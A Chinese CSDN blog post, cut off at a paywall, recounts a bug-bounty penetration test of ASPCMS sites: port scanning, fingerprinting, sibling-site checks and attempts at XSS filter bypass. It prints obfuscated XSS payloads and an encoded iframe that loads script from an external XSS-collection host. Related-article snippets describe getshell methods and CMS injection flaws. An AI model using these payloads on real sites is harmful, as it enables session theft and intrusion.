为了冰箱贴的一次渗透测试

最新推荐文章于 2024-04-10 08:48:16 发布
最新推荐文章于 2024-04-10 08:48:16 发布
阅读量927 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40418457/article/details/118304382
版权
本文记录了一次针对ASPCMS建站系统的渗透测试过程,涉及端口扫描、XSS与SQL注入尝试、旁站利用、弱口令攻击和漏洞挖掘。在测试中,作者发现了多个安全问题,包括SQL注入、XSS过滤绕过等,但最终未能深入所有服务器的后台。文章强调了渗透测试的复杂性和挑战性。
摘要由CSDN通过智能技术生成

作者:贝米少年

在漏洞盒子看到冰箱贴不错 刷点站

目标:还是建站系统(因为建站系统的客户基本都做seo 大概都是在权1左右 正好达标)

Nmap 扫一下端口 看到8888知道是宝塔 终于不是虚机了。。。 3389开启

image-20210514091556782

尝试访问一下888/pma 8080 8888 8080访问不了

image-20210514093509769

image-20210514093441790

image-20210514093855741

whatweb.bugscaner.com 查询一下服务器信息 得知 aspcms

image-20210514093843802

查看旁站 tools.ipip.net/ 点进去看了几个 全是ASPCMS

image-20210514094027205

试了一下网上的exp 都没有存在 应该都被修复了吧 后台也没找到

找到一个框框,尝试XSS 被拦了

image-20210514101639201

image-20210514101729885

使用不常见标签bypass 还是被拦了

burpsuite fuzz 找到几个200 的

image-20210514103223758

在先知找了几个bypass payload 还是有过滤了

<video onkeyup=setTimeout'al\x65rt\x28/2/\x29'''>
<svg onmouseover=setTimeout'al\x65rt\x28/233/\x29'''>

image-20210514103314099

实体16进制编码

WIDTH=0 HEIGHT=0 srcdoc=。。。。。。。。。。<script sRC="https://xss.pt/aNWy"></script>>

以上实体16进制编码进行一次URL编码

%3Ciframe%20WIDTH%3D0%20HEIGHT%3D0%20srcdoc%3D%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%E3%80%82%26%

最低0.47元/天 解锁文章
火线安全
关注
FOFA使用教程之从零到精通
布啦啦
11-07 274
真的是码了好几天了,觉得心里累得不行,不知道在读文章的你有没有同样的经历和感受,如果真的想敲出来一篇能让绝大多数人都能看懂、学明白的文章,是多么的伤心劳神,这篇文章,还没有写到结束,仍然在不断的更新之中。。希望能帮到你,如果有什么不明白的地方,也欢迎随时评论留言,我看到就会回复你。看到这里的时候,你应该已经对FOFA是干嘛用的、网络空间资产测绘是啥东西都搞清楚了吧?如果还不明白的话,你直接下方评论找我,我一对一辅导你。FOFA是一款网络空间测绘的搜索引擎,可以帮助你以搜索的方式查找公网上的互联网资产。
嵌入式学习1
weixin_64033212的博客
01-19 1290
电感器是一种电子元件,用于在电路中存储和释放能量,它是由一个线圈组成,通常由铜线绕成,通常带有一个铁芯,当电流通过电感器时,他会在线圈中产生一个磁场,从而存储能量。当电流停止流动时,磁场会崩溃,导致电感器释放能量。
渗透测试-getshell学习总结
lza20001103的博客
08-26 2889
getshell学习总结 文章目录getshell学习总结一、方法分类1.带有漏洞的应用2.常规漏洞3.后台拿shell二、网站常见getshell方法1.数据库备份拿shell2.上传3.修改允许上传类型4.服务器解析漏洞5.编辑器6. 网站配置插马7.上传插件8.数据库执行9.文件包含10. 命令执行三、常见cms后台拿shell1.dedecms一、后台文件上传二、数据库执行拿shell2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库)1.上传图片马2.审查元素,找到图片马路径3.开始备
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)
00勇士王子的博客
01-12 7576
简介 PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/ 靶场搭建 使用在线靶场http://vulfocus.fofa.so 进入环境,发现需要获取授权码 https://www.pboot
wp篇 AWD某一赛题全流程复现【江西省高校网络安全技能大赛】
这周末在做梦的博客
11-06 5718
一,赛题概述 1概述 这道题目是PbootCMS V3.05,主页面如下。 2配置概述 采用tutum/lamp的镜像,Php 5.3+,其他扩展自行apt安装即可 3漏洞赛题 目前在dump下来的镜像中,发现存在且非CMS本身的官方预制漏洞有三,分别记录如下。 备注:在复现以下漏洞的时候,为了图一省事就赋予了所有文件777权限。 二,RCE 1赛题预制原理 (1)文件预制 .htaccess中 AddType application/x-httpd-php .sql php_value auto_ap
分享一条宝塔PBOOTCMS自动清理rumtime缓存目录的SHELL脚本
weixin_45456642的博客
10-23 1415
PBOOTCMS会产生缓存,但建站多的,用二级目录更多的伙伴更加的会感到头疼,虽然现在最新版出来了三天自动清理功能,那么如果你有几百个站呢,你不去清理服务器的磁盘内存早晚会崩,如果你想清理呢,还得去更新去升级,升级后才能实现自动清理,很麻烦的。 这一条SHELL脚本是PB2345付费请教的,免费分享出来,主要针对宝塔面板【当然也可以用作搜寻删除其他统一文件夹目录】
《黑客之道》--网络安全 黑客攻防教程 渗透测试 利用第三方服务对目标进行被动信息收集防止被发现
xueshenlaila的博客
11-01 1352
被动信息收集 3.1.1 被动信息收集概述和目的 信息收集的方式可以分为两种:被动和主动。 被动信息收集方式是指利用第三方的服务对目标进行访问了解,比例:Google搜索。 主动的信息收集方式:通过直接访问、扫描网站,这种将流量流经网站的行为。比如:nmap扫描端口。 被动信息收集的目的:通过公开渠道,去获得目标主机的信息,从而不与目标系统直接交互,避免留下痕迹。 3.1.2 信息收集内容 IP地址段 域名信息 邮件地址 文档图⽚数据 公司地址 公司组织架构 联系电话 / 传真号码 人员姓名 / 职务
专家教你如何除去不干胶标签.pdf
09-30
- 让油分渗透一段时间,通常需要几分钟至十几分钟不等。 - 使用布或纸巾将软化后的标签和多余的油分擦去。 - 对于残留的油迹或胶迹,可以使用温水和中性洗液清洗。 4. 使用冷冻法 如果上述方法不易操作或不适用,...
Android设备研发术语表
热门推荐
green1900的专栏
03-08 2万+
A 术语 简介 APSS Applications Subsystem ACDB Audio Calibration Database ADC Analog-to-Digital Conversion,模拟 - 数字转换 ...
【代码审计】后台Getshell的两种常规姿势
04-15 1814
0x00 前言 在早些年刚接触web安全的时候,基础套路都是找注入--找后台--找上传点--找数据库备份--Getshell,然而在代码审计的角度,也存在类似的基本操作。 这里结合代码实例介绍白盒Getshell的两种常规姿势:写入配置文件Getshell、模块安装Getshell。 0x01 环境搭建 Doccms官网:http://www.doccms.com程序源码:D...
PHP赋值函数的利用需求
weixin_33910460的博客
08-30 135
拿一段PHP代码来说 <?php class Site { /* 成员变量 */ var $url; var $title; /* 成员函数 */ function setUrl($par){ $this->url = $par; } function getUrl(){ echo $this-&...
PbootCMS 3.0.4 SQL注入
hongduilanjun的博客
08-28 1230
所以要自己进行 POST请求(1=select 1),请求会被 request函数 处理后赋值给 $where3,然后处理 SQL语句。通过对 search 或 keyword 进行 GET请求 都可以调用 SearchController类 的 index方法。就是,并且data 只能包含中文、字母、数字、横线、点、逗号、空格,然后通过 escape_string函数 进行过滤。页面中的搜索框是对 keyword 进行 GET请求 的,但是如果用 keyword 请求,变量会被销毁。
pbootcms SQL注入 (CVE-2018-16356)
m0_65150886的博客
01-03 800
PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。后台路径:/admin.php 用户名密码:admin:123456。1.访问ip:port,进入环境,发现需要获取授权码。用户名密码:admin:123456。6.再次访问网站,已经可以正常访问了。2.进入网站,输入域名获取授权码。后台路径:/admin.php。7.构造payload。
“PbootCMS漏洞揭秘:绕过登录检查获取管理员权限“
奇妙的Bug之旅
01-14 3856
PbootCMS是一款基于PHP开发的内容管理系统,提供了丰富的功能和模块,但也存在一些安全漏洞。本文将介绍并详细分析PbootCMS中的一个漏洞,同时提供一个完整的实例来展示漏洞的利用过程。本文详细介绍了PbootCMS中的一个漏洞,并提供了一个完整的实例来展示漏洞的利用过程。通过了解漏洞的原理和修复方法,我们可以更好地加强系统的安全性,保护网站和用户的信息安全。
暗月渗透实战靶场-项目八(上)
高高同学
02-10 6806
暗月渗透实战靶场-项目八
Goby漏洞更新 | PbootCMS 3.1.2 远程代码执行漏洞(CVE-2022-32417)
m0_46699477的博客
04-01 6045
PbootCMS是PbootCMS个人开发者的一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻击者可通过该漏洞引发代码远程执行。
0day PbootCMS-pboot远程命令执行漏洞
最新发布
weixin_43167326的博客
04-10 2360
PbootCMS是全新内核且永久开源免费的PHP企业网站开发建设管理系统,是一套高效、简洁、 强悍的可免费商用的PHP CMS源码,能够满足各类企业网站开发建设的需要。在PbootCMS V3.1.2版本中存在RCE漏洞导致攻击者可利用该漏洞远程执行命令。
Windows环境部署PbootCMS企业网站管理系统
一本正经学技术
11-12 3431
windows环境,部署php7,部署nginx,部署pbootcms网站系统。
常见的CMS后台getshell姿势总结
记录学习,一起进步
03-21 1643
WordPress,dedecms,aspcms,南方数据企业系统,phpmyadmin日志,pageadmin,无忧企业系统等CMS进行getshell
物联网与OT安全渗透测试详解
"Pentest IoT and OT - Overview.pdf 是一份关于物联网(IoT)和操作技术(OT)领域的网络安全渗透测试的文档,由JOAS ANTONIO分享。文档提供了对IoT/OT的深入理解,并探讨了它们在网络安全中的重要性。" **物联网(IoT)...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值